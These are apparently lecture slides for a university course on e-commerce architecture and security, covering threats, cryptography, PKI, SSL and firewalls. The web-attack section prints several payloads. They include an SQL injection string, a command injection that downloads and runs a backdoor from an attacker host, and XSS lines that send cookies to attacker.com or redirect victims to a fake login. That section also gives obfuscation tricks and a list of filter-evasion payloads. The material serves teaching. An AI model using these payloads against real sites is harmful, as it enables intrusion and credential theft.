Unit 5: Financial1 Unit 5 Financial Dr. Supakorn Kungpisdan.
EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan.
-
Upload
adam-craig -
Category
Documents
-
view
222 -
download
0
Transcript of EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan.
EC Architectural Framework and EC Security
Lecture 7
Supakorn Kungpisdan
ITEC5611
S. Kungpisdan2
Outline
• EC Architectural Framework• EC Security
– Basic Security Issues– Security Incidences– Attacking Web Applications– Access Controls– Securing EC Communications– Securing EC Networks– Operations Security– Law, Investigation, and Ethics
ITEC5611
S. Kungpisdan3
Secure Payment ProtocolsOnline Payment Infrastructure
Security and Encryption Technology
Network Protocol StandardsNetwork Infrastructure (Internet)
Business Service InfrastructureDirectories, Search Engines etc
Netw
orked
Mu
ltimed
ia conten
t p
ub
lishin
g techn
ologies( HT
ML
,XM
L,
JAV
A,G
raph
ics, Vid
eo tools etc.)Info
rmat
ion
Dis
trib
uti
on &
Mes
sagi
ng
Tec
hn
olog
ies
( H
TT
P,S
MT
P, e
tc.)
Legal and Public Policy FrameworkPublic key, Identification and Authentication Infrastructure
E-commerce ApplicationsCatalog based retail, Marketing & Advert.,
Banking& Investments, Supply Chain Management, Auctions, Home shopping,
procurements
E-commerce ApplicationsCatalog based retail, Marketing & Advert.,
Banking& Investments, Supply Chain Management, Auctions, Home shopping,
procurements
EC Framework
ITEC5611
S. Kungpisdan4
Network Infrastructure
• The Internet Superhighway is responsible for seamless, reliable transportation on Information among host devices.
• Local Area Networks, IEEE 802.3 Standards and Ethernet
• Wide Area Networks• The Seamless Interface is offered through
– Internet and TCP/IP Model– IP Addressing and Domain Naming System– Internet Industry Structure
ITEC5611
S. Kungpisdan5
Information Distribution Technologies
• Standard Protocols for Information Distribution on Internet– File Transfer Protocol (FTP)– Simple Mail Transfer Protocol (SMTP) – Hyper Text Transfer Protocol (HTTP)– Web Server Implementations
• Apache Web Server• Microsoft’s IIS
ITEC5611
S. Kungpisdan6
Multimedia Publishing Technologies
• Information Publishing and Web Browsers– Hyper Text Markup Language (HTML)– Forms and Common Gateway Interface – Active Server Pages (ASP) – Dynamic HTML– HTML Editors– XML
• Multimedia Content – Graphics and Image Formats– Web Image Formats– Other Multimedia objects
• VRML (Virtual Reality Markup Language)
ITEC5611
S. Kungpisdan7
Security and Encryption
• Importance of security for Electronic Commerce and Inherent vulnerability of Internet
• Protecting the Web (HTTP) Service• The Issues in Transaction Security
– Cryptography and Cryptanalysis– Symmetric key cryptographic Algorithms– Public-key Algorithms– Authentication protocols– Integrity and Non-repudiation
• Digital Certificates and Signatures• Electronic Mail Security
– PGP, S/MIME• Security protocols for E-commerce
– SSL, TLS
ITEC5611
S. Kungpisdan8
Payment Services
• Payment Systems• Characteristics of Online Payment Systems
– Pre-Paid Electronic Payment Systems– Instant-paid Electronic Payment Systems– Post-Paid Electronic Payment Systems
• Some Electronic Payment Systems – Secure Electronic Transaction (SET) for Credit Cards– E-cash– NetCheque
ITEC5611
S. Kungpisdan9
Business Service Infrastructure
• Searching and Locating Information on Web Space• Information Directories• Search Engines• Improving the search results • Internet Advertising
ITEC5611
S. Kungpisdan10
Public Policy and Legal Infrastructure
• Universal Access to Network Infrastructure• Model Law for Electronic Commerce• Taxation Issues in Electronic Commerce• Need for Public Key Infrastructure (PKI)• Digital Certificates and Digital Signatures
ITEC5611
S. Kungpisdan11
Outline
• EC Architectural Framework• EC Security
– Basic Security Issues– Security Incidences– Attacking Web Applications– Access Controls– Securing EC Communications– Securing EC Networks– Operations Security– Law, Investigation, and Ethics
ITEC5611
S. Kungpisdan12
Basic Security Issues
• From the user’s perspective:– Is Web server owned and operated by a legitimate
company?– Does Web page and form contain any malicious or
dangerous code or content?– Will the owner of the Web site will not distribute the
information the user provides to some other party?
ITEC5611
S. Kungpisdan13
Basic Security Issues (cont.)
• From the company’s perspective:– How does the company know the user will not
attempt to break into the Web server or alter the pages and content at the site?
– How does the company know that the user will not try to disrupt the server so that it is not available to others?
ITEC5611
S. Kungpisdan14
Basic Security Issues (cont.)
• From both parties’ perspectives:– How do both parties know that the network
connection is free from eavesdropping by a third party “listening” on the line?
– How do they know that the information sent back-and-forth between the server and the user’s browser has not been altered?
S. Kungpisdan15
Goals of Computer Security (CIA)
• Confidentiality– Ensure that the message is accessible only by authorized
parties
• Integrity– Ensure that the message is not altered during the
transmission
• Availability– Ensure that the information on the system is available for
authorized parties at appropriate times
ITEC5611
ITEC5611
S. Kungpisdan16
Basic Security Issues
• Authentication• Authorization• Auditing• Confidentiality (Privacy)• Integrity• Availability• Non-repudiation
S. Kungpisdan17
Security Trends
ITEC5611
S. Kungpisdan18
Vulnerabilities, Threats, and Attacks
• Vulnerability– A weakness in the security system
– E.g. a program flaw, poor security configuration, bad password policy
• Threat– A set of circumstances or people that potentially causes
loss or harm to a system
• Attack– An action or series of actions to harm a system
ITEC5611
S. Kungpisdan19
Relationships among different Security Components
ITEC5611
S. Kungpisdan20
Relationship of Threats and Vulnerabilities
ITEC5611
S. Kungpisdan21
How Hackers Exploit Weaknesses
ITEC5611
ITEC5611
S. Kungpisdan22
General Security Issues at EC Sites
ITEC5611
S. Kungpisdan23
Outline
• EC Architectural Framework• EC Security
– Basic Security Issues– Security Incidences– Attacking Web Applications– Access Controls– Securing EC Communications– Securing EC Networks– Operations Security– Law, Investigation, and Ethics
S. Kungpisdan24
Types of Security Incidences
ITEC5611
S. Kungpisdan25
Hackers
• White Hat Hackers
• Grey Hat Hackers
• Script Kiddies
• Hacktivists
• Crackers or Black Hat Hackers
ITEC5611
S. Kungpisdan26
Hackers’ Steps
1. Gather information Telephone conversation, password crackers
2. Gain initial system access Often limited access and rights
3. Increase privileges and expand access Try to get root privilege
4. Carry out purpose of the attack Steal or destroy information
5. Install backdoors Build entrance for the next visit
6. Cover tracks and exit Remove all traces. Usually modifying log files
ITEC5611
S. Kungpisdan27
Malicious Codes
• Viruses– A destructive program code that attaches itself to a host
and copies itself and spreads to other hosts– Viruses replicates and remains undetected until being
activated.
• Worms– Unlike viruses, worms is independent of other programs or
files. No trigger is needed.
• Trojans– Externally harmless program but contains malicious code
• Spyware– Software installed on a target machine sending information
back to an owning server
ITEC5611
ITEC5611
S. Kungpisdan28
Security Incidences• Probe
– A probe is characterized by unusual attempts to gain access to a system or to discover information about the system.
– Sometimes followed by a more serious security event, but they are often the result of curiosity or confusion.
• Scan – A large number of probes done using an automated tool. – Often a prelude to a more directed attack on systems whose security
can be breached.• Account Compromise
– Unauthorized use of a computer account by someone other than the account owner, without involving system-level or root-level privileges. It might expose the victim to serious data loss, data theft, or theft of services.
– The lack of root-level access means that the damage can usually be contained, but a user-level account opens up avenues for greater access to the system.
ITEC5611
S. Kungpisdan29
Security Incidences (cont’d)
• Root Compromise – Similar to an account compromise, except that the
account that has been compromised has special privileges on the system.
• Packet Sniffer – A program that captures data from information packets
as they travel over the network.
ITEC5611
S. Kungpisdan30
Security Incidences (cont’d)
denial-of-service (DoS) attackAn attack on a Web site in which an attacker uses specialized software to send a flood of data packets to the target computer with the aim of overloading its resources
distributed denial-of-service (DDoS) attackA denial-of-service attack in which the attacker gains illegal administrative access to as many computers on the Internet as possible and uses the multiple computers to send a flood of data packets to the target computer
ITEC5611
S. Kungpisdan31
Using Zombies in a Distributed DoS Attack
ITEC5611
S. Kungpisdan32
Outline
• EC Architectural Framework• EC Security
– Basic Security Issues– Security Incidences– Attacking Web Applications– Access Controls– Securing EC Communications– Securing EC Networks– Operations Security– Law, Investigation, and Ethics
Attacking Web Applications
• The majority of vulnerabilities are caused by a lack of proper input validation by the application before processing user-supplied data
• This can allow attackers to disclose information about the site, steal information from backend DBs, or execute binary code on the web server
S. Kungpisdan33ITEC5611
SQL Injection
• Many web applications rely on backend DBs for information storage and retrieval.
• Sometimes a script will perform a DB query using input supplied from a web page, without verifying that the input does not contain any escape characters
• Consider the following:• Query = “SELECT * FROM users WHERE username =
‘{$_POST[‘user’]}’ AND password = ‘{$_POST[‘pass’]}’ ”;
• “SELECT * FROM users WHERE username = ‘bob’ AND password = ‘ ’ OR 1=1 ”;
S. Kungpisdan34ITEC5611
Code Injection
• Sometimes user-supplied strings are not properly checked for escape characters before being passed to commands as arguments
• Consider a PHP script that takes a string supplied from web page form and passes it to the nslookup utility
S. Kungpisdan35ITEC5611
Code Injection (cont.)
• If supply ;ls –la/, the script will execute the command nslookup;ls –la/, resulting in a listing of the root directory being printed out
S. Kungpisdan36ITEC5611
Code Injection (cont.)
• wget and perl commands could be used to download and run a backdoor on the web server by supplying the following line to the script
• ;wget http://attackersite/backdoor.pl;perl backdoor.pl
S. Kungpisdan37ITEC5611
Cross-Site Scripting (XSS)
• XSS vulnerabilities allow attackers to inject code or HTML into a web page that will be executed when a different user visits that page
• These attacks target visitors to a web site, not the site itself, and occur when a web page does not properly sanitize user input before using it in output
• As a matter of fact in vulnerable websites is possible to execute HTML and JavaScript codes from a not sanitized form, which combined can be really dangerous: it's possible to steal cookies or to redirect web pages to build fake login in order to steal login usernames and passwords.
S. Kungpisdan38ITEC5611
Types of XSS
• The term XSS is actually a bit elusive because it includes different kinds of attacks that stands each other on different attacking mechanisms.
• There are actually three types of Cross-Site Scripting, commonly named as: – DOM-Based XSS – Non-persistent XSS – Persistent XSS
S. Kungpisdan39
Ref: http://www.milw0rm.com/papers/146http://en.wikipedia.org/wiki/Cross_Site_Scripting
ITEC5611
DOM-based XSS
• DOM-based or Type 0 XSS vulnerability, also referred to as local XSS, is based on the standard object model for representing HTML or XML called the Document Object Model or DOM for short.
• The DOM-Based XSS allows to an attacker to work not on a victim website but on a victim local machine
S. Kungpisdan40ITEC5611
DOM-based XSS (cont.)
1. The attacker creates a well-built malicious website
2. The ingenuous user opens that site
3. The user has a vulnerable page on his machine
4. The attacker's website sends commands to the vulnerable HTML page
5. The vulnerable local page execute that commands with the user's privileges on that machine
6. The attacker easily gain control on the victim computer.
S. Kungpisdan41ITEC5611
Exploit Scenario
1. Mallory sends the URL of a maliciously constructed web page to Alice, using email or another mechanism.
2. Alice clicks on the link.
3. The malicious web page's JavaScript opens a vulnerable HTML page installed locally on Alice's computer.
4. The vulnerable HTML page contains JavaScript which executes in Alice's computer's local zone.
5. Mallory's malicious script now may run commands with the privileges Alice holds on her own computer.
S. Kungpisdan42ITEC5611
DOM-based XSS (cont.)
• DOM-based XSS is really dangerous because it operates on the victim system strictly and as long as the user doesn't look after his/her security issues and doesn't apply updates, the DOM-Based XSS will work fine.
• Solution: To prevent this kind of attacks there are only two things to take care of:– Do not visit untrusted website – Keep your system up to date
S. Kungpisdan43ITEC5611
Non-persistent XSS
• The non-persistent or Type 1 XSS is also referred to as a reflected vulnerability, and is by far the most common type.
• It's commonly named as "non-persistent" because it works on an immediate HTTP response from the victim website
• It shows up when data provided by a web client is used immediately by server-side scripts to generate a page of results for that user.
• If unvalidated user-supplied data is included in the resulting page without HTML encoding, this will allow client-side code to be injected into the dynamic page
S. Kungpisdan44ITEC5611
Non-persistent XSS: Search Engine
• Attacker writes some arbitrary HTML code in the search textbox and, if the website is vulnerable, the result page will return the result of these HTML entities.
• If this happens at 99% the Search engine will execute also JavaScript arbitrary code.
S. Kungpisdan45ITEC5611
Example
1. Assure that a website works like this: http://www.example.com/search.php?text=TEXTTOSEARCH
2. Try to include some HTML tags in the "text" variable: http://www.example.com/search.php?text=<img src="http://attacker.com/image.jpg">
If the website is vulnerable it will display the attacker's image into the result webpage.
S. Kungpisdan46ITEC5611
Example (cont.)
3. Try then to write some JavaScript code: http:///www.example.com/search.php?text=<script>alert(document.cookie)</script>
Probably the website will return an alert popup with the current Cookie for the site itself.
S. Kungpisdan47ITEC5611
Example (cont.)
• This vulnerability can be used by the attacker to steal information to users of the victim website providing them for example an email with an URL like: http://www.victim.com/search.php?text=MALICIOUSCODE
• To make that URL less suspicious it will be useful to encode the code in URL Hex valueFor example the code: <script>alert("XSS")</script> Encoded will look like: %3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%22%58%53%53%22%29%3B%3C %2F%73%63%72%69%70%74%3E
S. Kungpisdan48ITEC5611
Example (cont.)
• And as comes the malicious url will turn from:
http://www.victim.com/search.php?text=<script>alert("XSS")</script>
Into: http://www.victim.com/search.php?text=%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%22 %58%53%53%22%29%3B%3C%2F%73%63%72%69%70%74%3E
Which, for a clueless user, it's lot less suspicious than the first one.
S. Kungpisdan49ITEC5611
Example (cont.)
1. The attacker realizes that the victim website is vulnerable to XSS
2. The attacker creates on his website an ad-hoc page which is used to steal sensible information, e.g. Cookies, or to make a fake login of the victim website.
3. The attacker provides to a user a crafted URL containing a malicious code like:
http://www.victim.com/search.php?text= <script>document.location("http://attackersite.com/fakelogin.php")</script>
Encoded in Hex.
4. The user visits the web page and is obscurely redirect the attacker's fakelogin
5. The user is invited to log into the system and he does.
6. The fake login steals the username and password of the victim.
S. Kungpisdan50ITEC5611
Exploit Scenario
1. Alice often visits a particular website, which is hosted by Bob. Bob's website allows Alice to log in with a username/password pair and store sensitive information, such as billing information.
2. Mallory observes that Bob's website contains a reflected XSS vulnerability.
3. Mallory crafts a URL to exploit the vulnerability, and sends Alice an email, making it look as if it came from Bob (i.e., the email is spoofed).
4. Alice visits the URL provided by Mallory while logged into Bob's website.
S. Kungpisdan51ITEC5611
Exploit Scenario (cont.)
5. The malicious script embedded in the URL executes in Alice's browser, as if it came directly from Bob's server. The script can be used to email Alice's session cookie to Mallory. Mallory can then use the session cookie to steal sensitive information available to Alice (authentication credentials, billing info, etc) without Alice's knowledge.
S. Kungpisdan52ITEC5611
Interesting Example
• http://www.yannarak.net/node/2
S. Kungpisdan53ITEC5611
Persistent XSS
• The persistent XSS is similar to non-persistent XSS – Both works on a victim site and tries to hack user information
• However, attacker doesn't need to provide the crafted URL to the users
• Because the website itself permits to users to insert fixed data into the system– This is the case for example of "guestbooks"
• Usually the users use that kind of tool to leave messages to the owner of the website
• An attacker can insert some malicious code in his message and let ALL visitors to be victim of that.
S. Kungpisdan54ITEC5611
Exploit Scenario
1. Bob hosts a web site allowing users to post messages and other content to the site for later viewing by other members.
2. Mallory notices that Bob's website is vulnerable to a type 2 XSS attack.
3. Mallory posts a message, controversial in nature, which may encourage many other users of the site to view it.
4. Upon merely viewing the posted message, site users' session cookies or other credentials could be taken and sent to Mallory's web server without their knowledge.
5. Later, Mallory logs in as other site users and posts messages on their behalf....
S. Kungpisdan55ITEC5611
Exploit Scenario (cont.)
• This works when the tool provided (the guestbook in the example) doesn't do any check on the content of the inserted message: it just inserts the data provided from the user into the result page.
• The attacker could easily insert as much code as he wants into the tool, for example:
<img src="javascript:document.location ('http://attacker.com/steal.php?cookie=' . encodeURI(document.cookie));">
This allows the attacker to steal the cookie of the victim user.
S. Kungpisdan56ITEC5611
More about XSS
• In order to make the attack less suspicious it's possible to "obfuscate" the IP address of the attacker's website, encoding the IP address with three formats: – Dword Address
– Hex Address
– Octal Address
• For example the IP address 127.0.0.1 will look like: – Dword: 2130706433 – Hex: 0x7f.0x00.0x00.0x01 – Octal: 0177.0000.0000.0001
• Try for example: http://0x7f.0x00.0x00.0x01/ and it will open your localhost web server.
S. Kungpisdan57ITEC5611
Possible XSS Cheats
• <IMG SRC="javascript:alert('XSS');"> • <IMG SRC=javascript:alert('XSS')> • <IMG
SRC="javascript :alert('PLAYH ACK.NET')">
• <IMG SRC="javascript:alert(String.fromCharCode(88,83,83))"> • <SCRIPT/XSS SRC="http://example.com/xss.js"></SCRIPT> • <<SCRIPT>alert("XSS");//<</SCRIPT> • <iframe src=http://example.com/scriptlet.html < • <INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');"> • <BODY BACKGROUND="javascript:alert('XSS')"> • <BODY ONLOAD=alert(document.cookie)> • <IMG DYNSRC="javascript:alert('XSS')">
S. Kungpisdan58ITEC5611
Possible XSS Cheats (cont.)
• <IMG DYNSRC="javascript:alert('XSS')"> <BR SIZE="&{alert('XSS')}">
• <IMG SRC='vbscript:msgbox("XSS")'> • <TABLE BACKGROUND="javascript:alert('XSS')"> • <DIV STYLE="width: expression(alert('XSS'));"> • <DIV STYLE="background-image:
url(javascript:alert('XSS'))"> • <STYLE TYPE="text/javascript">alert('XSS');</STYLE> • <STYLE
type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
• <?='<SCRIPT>alert("XSS")</SCRIPT>'?> • <A
HREF="javascript:document.location='http://www.example.com/'">XSS</A>
S. Kungpisdan59ITEC5611
Information Disclosure
• An error page can discloses the path of thee web server’s root directory
• The path disclosure can aid attackers performing reconnaissance on the site
• phpinfo.php, part of a default PHP install, is a script providing the OS and software version on the host and other related information
• Google for inurl:phpinfo.php to see exactly how much information is leaked
S. Kungpisdan60ITEC5611
ITEC5611
S. Kungpisdan61
Outline
• EC Architectural Framework• EC Security
– Basic Security Issues– Security Incidences– Attacking Web Applications– Access Controls– Securing EC Communications– Securing EC Networks– Operations Security– Law, Investigation, and Ethics
ITEC5611
S. Kungpisdan62
CIA for Access Control
• Confidentiality– Not disclosed to unauthorized person
• Integrity– Prevention of modification by unauthorized users– Prevention of unauthorized changes by otherwise authorized
users– Internal and External Consistency– Internal Consistency within the system (i.e. within a database
the sum of subtotals is equal to the sum of all units)– External Consistency – database with the real world (i.e.
database total is equal to the actual inventory in the warehouse)
• Availability– Timely access
ITEC5611
S. Kungpisdan63
Security Controls
Ref: . Harris, CISSP All-in-One Exam Guide, 3rd Edition, McGraw-Hill
ITEC5611
S. Kungpisdan64
Security Controls (cont.)
Ref: . Harris, CISSP All-in-One Exam Guide, 3rd Edition, McGraw-Hill
ITEC5611
S. Kungpisdan65
Authentication
• Something you know– Passwords, pins
• Something you have– Tokens, smart cards
• Something you are– biometrics
ITEC5611
S. Kungpisdan66
Biometrics
biometric systemsAuthentication systems that identify a person by measurement of a biological characteristic, such as fingerprints, iris (eye) patterns, facial features, or voice
physiological biometricsMeasurements derived directly from different parts of the body (e.g., fingerprint, iris, hand, facial characteristics)
behavioral biometricsMeasurements derived from various actions and indirectly from various body parts (e.g., voice scans or keystroke monitoring)
ITEC5611
S. Kungpisdan67
Biometrics (cont.)
• Fingerprints• Palm Scans• Hand Geometry• Retina Scans• Iris Scans• Facial Scans• Voice Print• Signature Dynamics• Keyboard Dynamics
ITEC5611
S. Kungpisdan68
Single Sign-on
• Kerberos• Allow a user to access many services from only
one authentication• Symmetric key encryption
– KDC – Kerberos-trusted Key Distribution Center– AS – Authentication Server– TGS – Ticket Granting Service
ITEC5611
S. Kungpisdan69
Kerberos (cont.)
Ref: W. Stallings, Cryptography and Network Security, 4 th Edition, Pearson-PrenticeHall
ITEC5611
S. Kungpisdan70
Intrusion Detection
• Network Based– Real Time, Passive– Snort
• Host Based – System and event logs– Limited by log capabilities
• Honey Pot• System Integrity Verifier (SIV)
– Tripwire
ITEC5611
S. Kungpisdan71
Intrusion Detection (cont.)
• Signature Based – (Knowledge Based)– Signatures of an attack are stored and referenced
– Failure to recognize slow attacks
– Must have signature stored to identify
• Statistical Anomaly Based (Behavior Based)– IDS determines “normal” usage profile using statistical samples
– Detects anomaly from the normal profile
ITEC5611
S. Kungpisdan72
Measures for compensating for both internal and external access violations
• Backups• RAID – Redundant Array of Inexpensive Disks• Fault Tolerance• Business Continuity Planning• Insurance
ITEC5611
S. Kungpisdan73
Outline
• EC Architectural Framework• EC Security
– Basic Security Issues– Security Incidences– Attacking Web Applications– Access Controls– Securing EC Communications– Securing EC Networks– Operations Security– Law, Investigation, and Ethics
Transaction Security Issues
• Disclosure:– Release of message contents to any person not authorized to
see them • Traffic Analysis:
– It refers to the discovery of the pattern of traffic between parties.• Masquerade:
– It refers to insertion of messages into the network from a fraudulent source.
• Content modification: – Changes to the contents of a message, including insertion,
deletion, transposition, or modification.
ITEC5611
S. Kungpisdan74
Transaction Security Issues (cont.)
• Sequence modification: – It refers insertion, deletion, and reordering of some sequenced
packets by the intruder during transmission.• Timing modification:
– It refers to delayed or replay of old message sequences that were recorded by intruder in an earlier transaction.
• Repudiation: – It refers to the denial of receipt of message by destination or
denial of transmission of message by source.
ITEC5611
S. Kungpisdan75
ITEC5611
S. Kungpisdan76
Encryption
The process of scrambling (encrypting) a message (plaintext) into ciphertext in such a way that it is difficult, expensive, or time-consuming for an unauthorized person to unscramble (decrypt) it
plaintext + encryption algorithm + key ciphertext
ITEC5611
S. Kungpisdan77
Basic Terminology
• plaintext - original message • ciphertext - coded message • cipher - algorithm for transforming plaintext to ciphertext • key - info used in cipher known only to sender/receiver • encipher (encrypt) - converting plaintext to ciphertext • decipher (decrypt) - recovering ciphertext from plaintext• cryptography - study of encryption principles/methods• cryptanalysis (codebreaking) - study of principles/
methods of deciphering ciphertext without knowing key• cryptology - field of both cryptography and cryptanalysis
ITEC5611
S. Kungpisdan78
ITEC5611
S. Kungpisdan79
Cryptography and Steganography
• Plaintext can be hidden by two ways:– Steganography: conceal the existence of the
message– Cryptography: render the message unintelligible to
outsiders using various kinds of transformation of the text
• Examples of Steganography– Character marking: overwrite text with pencil– Invisible ink: use special substance– Pin punctures: pin puncture on selected letters
ITEC5611
S. Kungpisdan80
How a Cryptosystem Works
Plaintext (M) (data file or messages)
encryption algorithm (E) + secret key A (KA)
Ciphertext (C) (stored or transmitted safely)
decryption algorithm (D) + secret key B (KB)
Plaintext (M) (original data or messages)
Note: Key A may be the same as Key B, depending on the algorithm
E(M) = CD(C) = MD(E(M)) = M
ITEC5611
S. Kungpisdan81
Brute Force Search
• always possible to simply try every key • most basic attack, proportional to key size • assume either know / recognise plaintext
Key Size (bits) Number of Alternative Keys
Time required at 1 decryption/µs
Time required at 106 decryptions/µs
32 232 = 4.3 109 231 µs = 35.8 minutes 2.15 milliseconds
56 256 = 7.2 1016 255 µs = 1142 years 10.01 hours
128 2128 = 3.4 1038 2127 µs = 5.4 1024 years 5.4 1018 years
168 2168 = 3.7 1050 2167 µs = 5.9 1036 years 5.9 1030 years
26 characters (permutation)
26! = 4 1026 2 1026 µs = 6.4 1012 years 6.4 106 years
ITEC5611
S. Kungpisdan82
Caesar Cipher
• earliest known substitution cipher• by Julius Caesar • first attested use in military affairs• replaces each letter by 3rd letter on• example:
meet me after the toga partyPHHW PH DIWHU WKH WRJD SDUWB
ITEC5611
S. Kungpisdan83
K=3
Inner: ciphertextOuter: plaintext
Caesar Cipher
ITEC5611
S. Kungpisdan84
Cryptanalysis of Caesar Cipher
• only have 26 possible ciphers – A maps to A,B,..Z
• could simply try each in turn • a brute force search • given ciphertext, just try all shifts of letters• do need to recognize when have plaintext• eg. break ciphertext "GCUA VQ DTGCM"
ITEC5611
S. Kungpisdan85
Types of Cryptography
• Symmetric Cryptography– Deploy the same secret key to encrypt and decrypt
messages– The secret key is shared between two parties– Encryption algorithm is the same as decryption
algorithm
• Asymmetric (Public-key) Cryptography– Private key, Public key– The secret key is not shared and two parties can
still communicate using their public keys– Encryption alg. is different from decryption alg.
ITEC5611
S. Kungpisdan86
Symmetric Cryptography
Ref: W. Stallings, Cryptography and Network Security, 4 th Edition, Pearson-PrenticeHall
ITEC5611
S. Kungpisdan87
Public-Key Cryptography
Ref: W. Stallings, Cryptography and Network Security, 4 th Edition, Pearson-PrenticeHall
ITEC5611
S. Kungpisdan88
Data Encryption Standard (DES)
• Derived in 1972 as derivation of Lucifer algorithm developed by Horst Fiestel at IBM
• Commercial and non-classified systems• DES uses 64 bit block size and 56 bit key, begins with
64 bit key and strips 8 parity bits• DEA is 16 round cryptosystem designed for
implementation in hardware• 56 bit key = 256 or 70 quadrillion possible keys• Distributed systems can break it. U.S. Government no
longer uses it• Triple DES – three encryptions using DEA are now being
used until AES is adopted
ITEC5611
S. Kungpisdan89
3DES
• Double encryption is subject to meet in the middle attack
• Encrypt on one end decrypt on the other and compare the values
• So Triple DES is used• Can be done several different ways:
– DES – EDE2 (encrypt key 1, decrypt key 2, encrypt key 1)
– DES – EE2 (encrypt key 1, encrypt key 2, encrypt key 1)
– DES –EE3 (encrypt key 1, encrypt key 2, encrypt key 3) - most secure
ITEC5611
S. Kungpisdan90
AES
• Advanced Encryption Standard• Block Cipher that will replace DES• Anticipated that Triple DES will remain approved for
Government Use• AES announced by NIST in January 1997 to find
replacement for DES
• October 2, 2000 NIST Selected Rijndael• 2 Belgian Cryptographers Dr. Daeman and Dr. Rijmen• Will be used by government for sensitive but unclassified
documents
ITEC5611
S. Kungpisdan91
RSA
• Rivest, Shamir and Addleman• Based on difficulty of factoring a number which
is the product of two large prime numbers, may be 200 digits each.
• Can be used for Encryption, key exchange, and digital signatures
ITEC5611
S. Kungpisdan92
Elliptic Curve Cryptography (ECC)
• Elliptic curve discrete logarithm are hard to compute than general discrete logarithm
• Smaller key size same level of security• Elliptic curve key of 160 bits = RSA of 1024 bits• Suited to smart cards and wireless devices (less
memory and processing)• Digital signatures, encryption and key
management
ITEC5611
S. Kungpisdan93
Digital Signal Standard (DSS) and Secure Hash Standard (SHS)
• Enables use of RSA digital signature algorithm or DSA –Digital Signature Algorithm (based on El Gamal)
• Both use The Secure Hash Algorithm to compute message digest then processed by DSA to verify the signature. Message digest is used instead of the longer message because faster.
ITEC5611
S. Kungpisdan94
MD5 and SHA-1
• MD5 Message Digest version 5– Developed by Ronald Rivest in 1991– Produces 128 bit message digest
• SHA-1– Secure Hash Algorithm produces 160 bit digest if
message is less than 2^64 bits.– It is computationally infeasible to find message from
message digest– It is computationally infeasible to find to different
messages with same message digest – Padding bits are added to message to make it a
multiple of 512
ITEC5611
S. Kungpisdan95
Digital Signatures
ITEC5611
S. Kungpisdan96
Public Key Certification Systems
• A source could post a public key under the name of another individual
• Digital certificates counter this attack, a certificate can bind individuals to their key
• A Certificate Authority (CA) acts as a notary to bind the key to the person
• CA must be cross-certified by another CA
ITEC5611
S. Kungpisdan97
Public Key Infrastructure
• Digital Certificates• Certificate Authorities (CA)• Registrations Authorities• Policies and procedures• Certificate Revocation• Non-repudiation support• Timestamping• Lightweight Directory Access Protocol• Security Enabled Applications• Cross Certification
ITEC5611
S. Kungpisdan98
Key Escrow
• Allowing law enforcement to obtain the keys to view peoples encrypted data
• Escrow the key in two pieces with two trusted escrow agents
• Court order to get both pieces• Clipper Chip – implemented in tamper proof
hardware
ITEC5611
S. Kungpisdan99
Key Management
• Key control• Key recovery• Key storage• Key retirement/destruction• Key Change• Key Generation• Key theft• Frequency of key use
ITEC5611
S. Kungpisdan100
E-mail Security
• Non-repudiation
• Confidentiality of messages
• Authentication of Source
• Verification of delivery
ITEC5611
S. Kungpisdan101
Secure Multipurpose Internet Mail Extensions (S/MIME)
• Adds secure services to messages in MIME format
• Provides authentication through digital signatures
• Follows Public Key Cryptography Standards (PKCS)
• Uses X.509 Signatures
ITEC5611
S. Kungpisdan102
Pretty Good Privacy - PGP
• Phil Zimmerman• Symmetric Cipher using IDEA• RSA is used for signatures and key distribution• No CA, uses “web of trust”• Users can certify each other
ITEC5611
S. Kungpisdan103
Secure Sockets Layer (SSL)
• Developed by Netscape in 1994• Uses public key to authenticate server to the client• Also provides option client to sever authentication• Supports RSA public Key Algorithms, IDEA, DES, and
3DES• Supports MD5 Hashing• HTTPS header• Resides between the application and TCP layer• Can be used by telnet, FTP, HTTP and e-mail protocols.• Based on X.509• Transaction Layer Security Successor to SSL
ITEC5611
S. Kungpisdan104
Outline
• EC Architectural Framework• EC Security
– Basic Security Issues– Security Incidences– Attacking Web Applications– Access Controls– Securing EC Communications– Securing EC Networks– Operations Security– Law, Investigation, and Ethics
ITEC5611
S. Kungpisdan105
OSI Security Services
• A security service is a collection of security mechanisms, files, and procedures that help protect the network.– Authentication– Access control– Data confidentiality– Data integrity– Non-repudiation– Logging and monitoring
ITEC5611
S. Kungpisdan106
OSI Security Mechanisms
• A security mechanism is a control that is implemented in order to provide the 6 basic security services.– Encipherment (encryption and decryption)– Digital signature– Access Control– Data Integrity– Authentication– Traffic Padding– Routing Control– Notarization
ITEC5611
S. Kungpisdan107
Application Layer Security
• SET – Secure Electronic Transaction– Originated by Visa and MasterCard– Being overtaken by SSL
• HTTPS - Secure HTTP– Early standard for encrypting HTTP messages– Also being overtaken by SSL
• S/MIME – Secure Multi-purposed Internet Mail Extension– Email encryption and digital signature
ITEC5611
S. Kungpisdan108
Transport Layer Security
• SSH-2 – Secure Shell version 2– SSH has RSA Certificates– Supports authentication, compression, confidentiality, and
integrity– DES Encryption– Because Secure Shell (SSH-2) supports authentication,
compression, confidentiality, and integrity, SSH is used frequently for Encrypted File Transfer
• SSL – Secure Socket Layer– Contains SSL record protocol and SSL Handshake Protocol– Uses symmetric encryption and public key for authentication– MAC – Message Authentication Code for Integrity
ITEC5611
S. Kungpisdan109
Firewalls
• Packet Filtering Firewall - First Generation– Screening Router– Operates at Network and Transport level– Examines Source and Destination IP Address– Can deny based on ACLs– Can specify Port
• Application Level Firewall - Second Generation– Proxy Server– Copies each packet from one network to the other– Masks the origin of the data– Operates at layer 7 (Application Layer)– Reduces Network performance since it has do analyze each
packet and decide what to do with it.– Also Called Application Layer Gateway
ITEC5611
S. Kungpisdan110
Firewalls (cont.)
• Stateful Inspection Firewalls – Third Generation– Packets Analyzed at all OSI layers– Queued at the network level– Faster than Application level Gateway
• Dynamic Packet Filtering Firewalls – Fourth Generation– Allows modification of security rules– Mostly used for UDP– Remembers all of the UDP packets that have crossed the
network’s perimeter, and it decides whether to enable packets to pass through the firewall.
• Kernel Proxy – Fifth Generation– Runs in NT Kernel– Uses dynamic and custom TCP/IP-based stacks to inspect the
network packets and to enforce security policies.
ITEC5611
S. Kungpisdan111
Demilitarized Zone (DMZ)
ITEC5611
S. Kungpisdan112
Virtual Private Networks
